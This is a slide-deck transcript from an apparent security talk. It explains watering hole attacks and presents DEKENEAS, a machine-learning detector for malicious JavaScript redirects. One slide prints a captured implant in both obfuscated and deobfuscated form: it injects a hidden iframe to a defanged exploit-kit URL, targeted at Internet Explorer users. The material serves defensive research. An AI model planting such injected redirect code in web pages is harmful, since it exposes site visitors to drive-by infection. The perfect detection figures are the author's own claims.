This document discusses watering hole attacks, a type of cyber attack where hackers compromise frequently visited websites to infect visitors' devices through drive-by exploits. It describes how watering hole attacks work, why they are difficult to detect, and introduces DEKENEAS, an AI-based solution developed by the author to detect watering hole attacks through analyzing obfuscated JavaScript. DEKENEAS trains on over 40,000 malicious redirect samples to recognize behavioral patterns and classify code as malicious or not. When tested on 10,000 new samples and top websites, it achieved 100% detection of unknown implants with no false negatives and a very low false positive rate of 0.00023%.
2. “WHAT IF I TOLD YOU THERE’S A TYPE OF CYBER ATTACK
THAT CAN INFECT YOUR COMPUTER WITHOUT YOU DOING
ANYTHING?”
3. IT’S CALLED “DRIVE-BY EXPLOITATION”. AND IT’S
DELIVERED THROUGH A VERY STEALTH TECHNIQUE CALLED
“WATERING HOLE”.
4. EVERYBODY IS FAMILIAR WITH PHISHING, SPEARPHISHING
OR DIRECT SERVER ATTACKS…
… BUT NOT MANY PEOPLE HEARD ABOUT WATERING HOLE
ATTACKS.
5. WHAT HAPPENS DURING A WATERING HOLE
ATTACK?
An adversary gains access to a system through a user visiting a website
through the normal course of browsing just like preditors stalking prey in
a real life watering hole
.
6. WHAT HAPPENS DURING A WATERING HOLE
ATTACK?
The attacker compromises a website a certain group of people normally visit
and alters the HTML code in such ways that the users are redirected to an
exploit kit who performs the actual exploitation.
.The actual exploitation will be or will not be performed against users
depending on certain factors, such as User-agent or IP addresses.
7. WHAT HAPPENS DURING A WATERING HOLE
ATTACK?
Finally, the exploitation kit installs a malware implant inside unsuspecting
user’s device.
10. RECENT HIGH PROFILE KNOWN COMPROMISES
- - Facebook, Google, Twitter – 2013, through an iOS dev forum
- - undisclosed financial targets – 2014, through forbes.com
- - Dragonfly campaign targeting multiple US government and critical
infrastructure sectors – 2016, through 3rd party suppliers websites
- - Polish banks – 2017, through the website of Financial Supervision
Authority of Poland
- - many others go undetected or as “unknown infection vector”
11. WHY ARE WATERING HOLES HARD TO DETECT?
- - unlike spearphishing or phishing there is no e-mail or other user
interaction involved
- - unlike direct service attacks there are no logs
- - the redirection to the compromised website happens in browser and
most of the times is highly obfuscated so no signature can be extracted
- - there rarely are two watering hole implants looking the same
therefore no signature can be extracted
12. WHY ARE WATERING HOLES HARD TO DETECT?
- - most of the times the exploit kits used employ either 0day or 1day
vulnerabilities so there is either no patch, or people had no time to patch
- - the deobfuscation routine runs in browser therefore an AV or firewall
running outside the browser cannot see the deobfuscated code, in order to
trigger alarms
- - the implants make use of anti-analysis techniques to deter automated
sandbox analysis
- - ALL KNOWN WATERING HOLE ATTACKS HAD BEEN DISCOVERED IN
POST EXPLOITATION STAGE, LONG AFTER THE ACTUAL COMPROMISE
13. OBFUSCATED WATERING HOLE JAVASCRIPT
VS. DEOBFUSCATED WATERING HOLE
JAVASCRIPT
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))
+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.repla
ce(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return
d[e]}];e=function(){return'w+'};c=1};while(c--
){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('i
9(){a=6.h('b');7(!a){5
0=6.j('k');6.g.l(0);0.n='b';0.4.d='8';0.4.c='8';0.4.e='f';0.m='w://
z.o.B/C.D?t=E'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-
1&&2.3("s")==-1))&&2.3("v")!=-1){5
t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFra
meEx|element|yahoo_api|height|
width|display|none|body|getElementById|function|createElement|ifra
me|appendChild|src|id|nl|msie|
toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000
|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
function MakeFrameEx(){
element = document.getElementById('yahoo_api');
if (!element){
var el = document.createElement('iframe');
document.body.appendChild(el);
el.id = 'yahoo_api';
el.style.width = '1px';
el.style.height = '1px';
el.style.display = 'none';
el.src =
'hxxp://juyfdjhdjdgh.nl.ai/showthread.php?t=72241732'
}
}
var ua = navigator.userAgent.toLowerCase();
if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1
&& ua.indexOf("webtv") ==- 1))
&& ua.indexOf("windows") !=- 1){
var t = setTimeout("MakeFrameEx()", 1000)
}
14. DETECTING WATERING HOLES THROUGH ARTIFICIAL
INTELLIGENCE - DEKENEAS
- - detecting the watering hole in post exploitation stage is
unacceptable in a secure computing environment
- - we focused on detecting the watering hole in its earliest stage:
redirection
- - redirection can be performed through various DOM elements, such
as iframes, document location or meta refresh, but most often
Javascript is used to conceal this behavior through obfuscation
15. DETECTING WATERING HOLES THROUGH ARTIFICIAL
INTELLIGENCE - DEKENEAS
- - to conclude our research we analyzed over 40,000 malicious redirect samples
- - we were able to determine general behavior metrics such as obfuscation, redirection,
anti analysis capabilities, coding patterns and typologies
- - by analyzing the HTML/Javascript instruction set we were able to classify instructions
based on these metrics and create a model to be used in our machine learning algorithm
- - not only instructions give the score, but also their context and placement inside the
code
- - we used +30k samples to train our algorithm and the remaining 10k were used to test
the algorithm
- - we use a supervised random forests implementation for classification because it uses
collections of trees with a random parameter holdout to build models, which often
outperforms individual trees.
16. DETECTING WATERING HOLES THROUGH ARTIFICIAL
INTELLIGENCE - DEKENEAS
- - the AI prediction is used to make the decision wether the DOM element
is suspicious or not
- - a Javascript and a generic sandbox are used in parallel to analyze
suspicious DOM elements, emulating user interaction (mouse movement,
keyboard activity, non-standard screen resolutions, etc.)
- - if there is inconsistency between AI predictions and sandboxes results,
the suspect DOM element is submitted for manual analysis
- - manual analysis is used to further train the machine learning algorithm,
thus diminishing the false positives/negatives.
17. DETECTING WATERING HOLES THROUGH ARTIFICIAL
INTELLIGENCE - DEKENEAS
- - we used approximately 10,000 malicious DOM samples and ALEXA
TOP 1000 websites to test our machine learning algorithm
- - during the testing phase we achieved 100% detection rate for
previously unknown implants, 0% false negative, 0.00023% false
positives.